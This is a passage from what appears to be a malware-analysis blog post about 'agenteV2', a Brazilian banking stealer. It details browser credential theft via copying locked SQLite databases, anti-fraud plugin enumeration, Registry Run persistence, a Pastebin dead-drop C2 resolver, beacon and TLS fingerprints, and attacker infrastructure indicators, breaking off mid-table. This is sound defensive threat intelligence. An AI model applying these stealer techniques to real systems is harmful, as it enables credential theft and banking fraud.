<p>The stealer targets all Chromium-based browsers (Chrome, Edge, Brave, Opera) across all user profiles. To bypass the SQLite file lock&nbsp;maintained&nbsp;by running browsers, it uses&nbsp;shutil.copyfile&nbsp;to duplicate the target database files into %TEMP% before executing SQL SELECT queries:&nbsp;&nbsp;</p>



<pre class="wp-block-code"><code>Target files: Login Data, Cookies, History  

Method: shutil.copyfile(src, %TEMP%&lt;random&gt;) → sqlite3.connect(copy) → SELECT * FROM logins </code></pre>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-300"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="3"
           data-wpID="300"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bc-03A9F4 wpdt-bold wpdt-fs-000014"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:45.407098121086%;                    padding:10px;
                    "
                    >
                                        String (.rdata)                     </th>
                                                <th class="wpdt-cell wpdt-bc-03A9F4 wpdt-bold wpdt-fs-000014"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:12.004175365344%;                    padding:10px;
                    "
                    >
                                        Address                     </th>
                                                <th class="wpdt-cell wpdt-bc-03A9F4 wpdt-bold wpdt-fs-000014"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:42.58872651357%;                    padding:10px;
                    "
                    >
                                        Capability                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Varre todos os perfis de navegadores e busca Inter/Stone no disco                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        0x18129845A                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Scans all browser profiles for Inter and Stone bank data                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        clonando o banco para ler mesmo se aberto                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        0x181298976D                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Explicit DB cloning to bypass file lock while browser is running                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-300'>
table#wpdtSimpleTable-300{ table-layout: fixed !important; }
table#wpdtSimpleTable-300 td, table.wpdtSimpleTable300 th { white-space: normal !important; }
.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}
.wpdt-fs-000014 { font-size: 14px !important;}
.wpdt-fs-000012 { font-size: 12px !important;}
</style>




<h4 class="wp-block-heading"><em>4.3.&nbsp;Security Controls &amp; Anti-Fraud Enumeration</em>&nbsp;</h4>



<p>The malware proactively profiles the host for regional anti-fraud and endpoint protection solutions before&nbsp;proceeding&nbsp;with credential theft a strong indicator of deliberate LATAM targeting:&nbsp;</p>



<ul class="wp-block-list">
<li>Diebold Warsaw (Warsaw Security Module) disk path queries for this&nbsp;widely-deployed&nbsp;Brazilian banking security&nbsp;plugin;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>GbPlugin&nbsp;disk path queries for this browser security plugin used by major Brazilian banks.&nbsp;</li>
</ul>



<p>Detection of these solutions&nbsp;likely influences&nbsp;the&nbsp;malware&#8217;s&nbsp;behavior (evasion, delayed execution, or alternate attack paths).&nbsp;</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="758" height="315" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_9.png" alt="" class="wp-image-20454" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_9.png 758w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_9-300x125.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_9-370x154.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_9-270x112.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_9-740x308.png 740w" sizes="(max-width: 758px) 100vw, 758px" /><figcaption class="wp-element-caption"><em>Diebold Warsaw and&nbsp;GbPlugin&nbsp;path references used for security controls enumeration</em></figcaption></figure>



<h4 class="wp-block-heading"><em>4.4. Analyst Assessment</em>&nbsp;</h4>



<p>agenteV2 is not a passive, fire-and-forget stealer. It is a purpose-built interactive agent designed for real-time manual financial fraud in the Brazilian market. The WebSocket architecture, live screen streaming, and remote shell capability are consistent with an operator-assisted attack flow: the threat actor watches the&nbsp;victim&#8217;s&nbsp;screen in real time, waits for a banking session to open, and interacts directly.&nbsp;&nbsp;</p>



<p>The&nbsp;Nuitka&nbsp;compilation&nbsp;demonstrates&nbsp;meaningful anti-analysis effort; however, the failure to strip debug strings, variable names, and cleartext URLs reveals the full implementation to any analyst with access to the binary a significant&nbsp;OpSec&nbsp;failure that partially undermines the obfuscation investment.&nbsp;</p>



<h4 class="wp-block-heading"><em>4.5.&nbsp;Persistence Mechanisms</em>&nbsp;</h4>



<p>The payload&nbsp;establishes&nbsp;a third persistence layer independently of the VBS loader:&nbsp;</p>



<pre class="wp-block-code"><code>Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 

Value: MonitorSystem 

Data: C:\Users\admin\AppData\Local\Temp\ONEFIL~1\agenteV2_historico_detect.py </code></pre>



<p>Note: the Registry Run value points to a .py&nbsp;file in %TEMP% this assumes either Python is installed and registered as a handler for .py&nbsp;files on the victim machine, or represents an implementation error by the threat actor (a common characteristic of amateur-but-functional malware). The name &#8216;MonitorSystem&#8217; is social engineering for any victim who opens regedit.&nbsp;</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="673" height="177" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_10.png" alt="" class="wp-image-20459" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_10.png 673w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_10-300x79.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_10-370x97.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_10-270x71.png 270w" sizes="(max-width: 673px) 100vw, 673px" /><figcaption class="wp-element-caption"><em>ANY.RUN Registry modification event: HKCU\Run\MonitorSystem&nbsp;key creation by wifi_driver.exe process</em></figcaption></figure>



<h3 class="wp-block-heading">5. Stage 3 C2 Communication&nbsp;</h3>



<h4 class="wp-block-heading"><em>5.1. Dead-Drop Resolver via Pastebin</em>&nbsp;</h4>



<p>agenteV2 does not hardcode the C2 IP. Instead, it implements a Pastebin-based dead-drop resolver allowing the threat actor to rotate C2 infrastructure without recompiling or redelivering the malware:&nbsp;</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="548" height="210" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_11.png" alt="" class="wp-image-20460" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_11.png 548w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_11-300x115.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_11-370x142.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_11-270x103.png 270w" sizes="(max-width: 548px) 100vw, 548px" /><figcaption class="wp-element-caption"><em>Browser pastebin.com/raw/0RmxqY57 raw content showing plaintext C2 address: 38.242.246.176 8443</em>&nbsp;</figcaption></figure>



<p>The resolver (documented in DLL strings as &#8216;Busca&nbsp;IP e Porta Base do Pastebin.&nbsp;Retorna&nbsp;(ip, port)&nbsp;ou&nbsp;None&#8217;) parses the Pastebin content to extract the IP and port as a tuple, with explicit error handling for fetch failures and malformed content.&nbsp;</p>



<h4 class="wp-block-heading"><em>5.2. Beacon Pattern&nbsp;</em></h4>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-301"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="2"
           data-rows="7"
           data-wpID="301"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:16.107382550336%;                    padding:10px;
                    "
                    >
                                        Parameter                     </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:83.892617449664%;                    padding:10px;
                    "
                    >
                                        Value                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Beacon interval                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        ~60 seconds (observed timestamps: +587ms, +61334ms, +121688ms, +182127ms, +242703ms...)                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Bytes sent                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        524 bytes per beacon (fixed size structured check-in payload)                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Bytes received                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        ~1 KB per beacon (task/command response)                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Transport                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        TCP/TLS port 8443                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Pastebin proxy                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        172.66.171.73:443 (Cloudflare used only for Pastebin resolution, not C2)                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Real C2                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        38.242.246.176:8443 (Contabo VPS, Düsseldorf, Germany)                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-301'>
table#wpdtSimpleTable-301{ table-layout: fixed !important; }
table#wpdtSimpleTable-301 td, table.wpdtSimpleTable301 th { white-space: normal !important; }
.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}
.wpdt-fs-000014 { font-size: 14px !important;}
.wpdt-fs-000012 { font-size: 12px !important;}
</style>



<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="571" height="405" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_12.png" alt="" class="wp-image-20465" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_12.png 571w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_12-300x213.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_12-370x262.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_12-270x192.png 270w" sizes="(max-width: 571px) 100vw, 571px" /><figcaption class="wp-element-caption"><em>ANY.RUN Network connections tab: periodic ~60s beacons and TLS connection details to 172.66.171.73</em></figcaption></figure></div>


<h4 class="wp-block-heading"><em>5.3. TLS Fingerprints&nbsp;</em></h4>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-302"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="2"
           data-rows="6"
           data-wpID="302"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:13.845099383139%;                    padding:10px;
                    "
                    >
                                        Fingerprint                     </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:86.154900616861%;                    padding:10px;
                    "
                    >
                                        Value                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000011 wpdt-align-left"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        JA3                     </td>
                                                <td class="wpdt-cell wpdt-fs-000011 wpdt-align-left"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        a48c0d5f95b1ef98f560f324fd275da1                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000011 wpdt-align-left"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        JA3 Full                     </td>
                                                <td class="wpdt-cell wpdt-fs-000011 wpdt-align-left"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        771,4866-4867-4865-49196-49200-49195-49199-52393-52392-49188-49192-49187-49191-159-158-107-103-255,0-11-10-16-22-23-49-13-43-45-51-21,29-23-30-25-24-256-257-258-259-260,0-1-2                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000011 wpdt-align-left"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        JA3S                     </td>
                                                <td class="wpdt-cell wpdt-fs-000011 wpdt-align-left"
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        15af977ce25de452b96affa2addb1036                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000011 wpdt-align-left"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        JA3S Full                     </td>
                                                <td class="wpdt-cell wpdt-fs-000011 wpdt-align-left"
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        771,4866,43-51                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000011 wpdt-align-left"
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        JARM                     </td>
                                                <td class="wpdt-cell wpdt-fs-000011 wpdt-align-left"
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        00000000000000000000000000000000000000000000000000000000000000 (Cloudflare/Pastebin proxy not C2 fingerprint)                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-302'>
table#wpdtSimpleTable-302{ table-layout: fixed !important; }
table#wpdtSimpleTable-302 td, table.wpdtSimpleTable302 th { white-space: normal !important; }
.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}
.wpdt-fs-000014 { font-size: 14px !important;}
.wpdt-fs-000011 { font-size: 11px !important;}
</style>




<p>The JA3 hash (a48c0d5f95b1ef98f560f324fd275da1) can be used as a network detection rule it will match agenteV2&#8217;s TLS&nbsp;ClientHello&nbsp;regardless of C2 IP rotation.&nbsp;</p>



<h3 class="wp-block-heading">6. Threat Actor Infrastructure&nbsp;</h3>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="483" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_13-1024x483.png" alt="" class="wp-image-20470" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_13-1024x483.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_13-300x141.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_13-768x362.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_13-1536x724.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_13-370x175.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_13-270x127.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_13-740x349.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_13.png 1940w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Shodan 38.242.246.176: Hestia Control Panel on port 8083, open ports list, hostname vmi3003111.contaboserver.net, nginx banner</em></figcaption></figure>



<h4 class="wp-block-heading"><em>6.1. Infrastructure Map&nbsp;</em></h4>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-303"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="7"
           data-wpID="303"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:15.203619909502%;                    padding:10px;
                    "
                    >
                                        Role                     </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:19.547511312217%;                    padding:10px;
                    "
                    >
                                        Asset                     </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:65.248868778281%;                    padding:10px;
                    "
                    >
                                        Details                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Phishing Gate / Tracker                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        odaracani[.]online                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Per-victim unique ID tracking (?id=3df947b3). POST → 302 redirect to payload server. IP: 69.49.241.120                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Payload Distribution                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        nuevaprodeciencia[.]club                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Hosts all EXE payloads (/br77b/arquivos/download/). C2 checkin endpoint (iayjaskyeiagds.php). IP: 69.49.241.120                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Shared Delivery IP                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        69[.]49.241[.]120                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Both delivery domains resolve to this single IP single hosting point for Stage 1/2 infrastructure                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Dead-Drop Resolver                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        pastebin[.]com/raw/0RmxqY57                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Public Pastebin page containing plaintext C2 IP:port. Accessed via Cloudflare (172.66.171.73:443)                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Real C2 Server                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        38[.]242.246[.]176:8443                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Contabo GmbH VPS. Hostname: vmi3003111.contaboserver.net. Hestia Control Panel on :8083                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        C2 ASN                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        AS51167 Contabo GmbH                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C7"
                    data-col-index="2"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Düsseldorf, Germany. Frequently abused by threat actors for permissive abuse handling                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-303'>
table#wpdtSimpleTable-303{ table-layout: fixed !important; }
table#wpdtSimpleTable-303 td, table.wpdtSimpleTable303 th { white-space: normal !important; }
.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}
.wpdt-fs-000014 { font-size: 14px !important;}
.wpdt-fs-000012 { font-size: 12px !important;}
</style>




<h4 class="wp-block-heading"><em>6.2. C2 Server Detail (Shodan)&nbsp;</em></h4>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-304"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="2"
           data-rows="8"
           data-wpID="304"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:15.083798882682%;                    padding:10px;
                    "
                    >
                                        Property                     </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:84.916201117318%;                    padding:10px;
                    "
                    >
                                        Value                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        IP                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        38.242.246.176                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Hostname                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        vmi3003111.contaboserver.net                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        ASN                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        AS51167 Contabo GmbH                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Country                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Germany (Düsseldorf)                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Control Panel                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Hestia Control Panel port 8083 (nginx, HTTP 200 OK, active session)                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Open Ports                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        21 (FTP), 22 (SSH), 25/465/587 (SMTP), 53 (DNS), 80/443 (HTTP/S), 8083 (Hestia), 8443 (C2)                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
